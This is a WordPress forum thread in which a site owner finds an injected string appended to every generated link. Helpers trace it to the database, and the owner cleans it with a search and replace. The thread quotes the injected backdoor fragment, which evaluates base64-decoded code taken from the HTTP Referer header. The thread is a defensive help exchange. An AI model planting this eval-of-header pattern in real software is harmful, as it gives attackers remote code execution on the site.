Posted 3 years ago #
I've been trying to fix this for 4 hours now and can't seem to figure out what's wrong.
Dynamically generated links (posts, comments, etc) have the following appended to their ends.
%&({$eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
I've looked at countless hacked threads, php injection solutions, Googled everything I can think of, and I've done all of the steps to Hardening WP.
Any idea what's going on, or where to look next?
Posted 3 years ago #
Oh, and here's the link to the website: shafr.org.
Hummm...I've typically seen that in the source code, but it looks like yours may be in the database. Have you looked in wp-config.php to make sure it's clean?
Posted 3 years ago #
wp-config.php is normal. DB stuff at top, keys, table prefix, lang and the wp-settings.php line.
I would suggest dumping your db and searching it. Typically, this code will be exactly the same, so once you find one instance of it, you can do a search/replace to clean it, then drop your original tables and import your cleaned db. Of course, this will not fix the problem that allowed this in the first place, but it should get you an operational blog back.
Posted 3 years ago #
Thanks for the suggestion. I found 38 instances, in 4 variations. Uploading new db now.
Do you know what would've caused this? I don't want another SQL bug.
Posted 3 years ago #
Amazing. That fixed it. Thanks so much, figaro.
This topic has been closed to new replies.
